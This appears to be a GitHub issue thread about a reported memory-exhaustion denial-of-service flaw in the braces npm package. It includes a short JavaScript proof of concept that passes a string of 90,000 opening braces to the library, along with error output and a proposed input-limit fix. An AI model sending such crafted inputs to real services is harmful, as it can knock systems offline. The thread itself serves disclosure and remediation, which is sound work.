-
Notifications
You must be signed in to change notification settings - Fork 64
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Braces is marked as DoS vulnerable via Memory Exhaustion by Blackduck #36
Comments
That's not enough information to provide a useful response. Please provide a detailed explanation of the vulnerability, and examples of how it would be exploited. |
That's fair. But I don't think the information is public accessible. Here is the quote from the report:
There is a link to checkmarx. But the link is also gated. |
We'll respond once you or someone else is willing to provide the information I requested above. A link to another source doesn't answer my question. That said, if you are allowing your users to submit regular expressions in a web form (brace patterns compile to regular expressions as is explained in several places in the readme), and you are using those regular expressions to perform operations on your server, you might have bigger problems than this library. There is no way to guarantee that users will create safe regular expressions, even if we check "star height". See https://en.wikipedia.org/wiki/Star_height_problem. |
@jonschlinkert please find more details+steps (kudos to Mário Teixeira)
|
Current code right now will throw from code in the repository: for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} with: Testing with 1 repeats...
/Users/coderaiser/braces/lib/parse.js:39
throw new SyntaxError(`Input length (${input.length}), exceeds max characters (${max})`);
^
SyntaxError: Input length (90000), exceeds max characters (65536) Anyways if we decrease
Possible solution, as mentioned @cichelero would be to limit count of unique symbols with an option In this case we will se: Testing with 1 repeats...
/Users/coderaiser/braces/lib/validate-input.js:10
throw SyntaxError(`To many symbols '${value}'. Maximum: ${maxSymbols} allowed. Received: ${count}`);
^
SyntaxError: To many symbols '{'. Maximum: 1024 allowed. Received: 9000
at module.exports.validateInput (/Users/coderaiser/braces/lib/validate-input.js:10:15)
at parse (/Users/coderaiser/braces/lib/parse.js:40:3) It can be override with an option according to user needs, but can have reasonable defaults. |
I have the same issue - my builds are being blocked by Blackduck due to this vulnerability. |
Same here. Waiting for a solution. |
Hello all our releases are blocked by this. Can you please help us here @jonschlinkert ? |
Same issue |
Same issue too |
Same issue here as well. Everything is blocked by this issue. Can you please help us, @jonschlinkert ? |
Looks like |
|
Any update on this? I see there are two PRs for fixes out there. |
PoC: const braces = require('braces');
const maxRepeats = 1;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} |
@paulmillr Was 3.0.3 released? |
+1 to that. I see the fix is merged but I don't see any new version available in NPM. |
Read this #37 (comment) |
sorry didn't mean to close this, hit enter when I thought it was focused on something else. but I'll keep it locked. |
Resolved by #40 |
With recent scan, we found that braces npm package is marked as DoS vulnerable with high security risk according to
BDSA-2024-2474
from Black Duck Security Advisory. As of now, no solution or workaround is available in the Blackduck report. Could someone from maintenance side to confirm this and provide a way to solve it?The text was updated successfully, but these errors were encountered: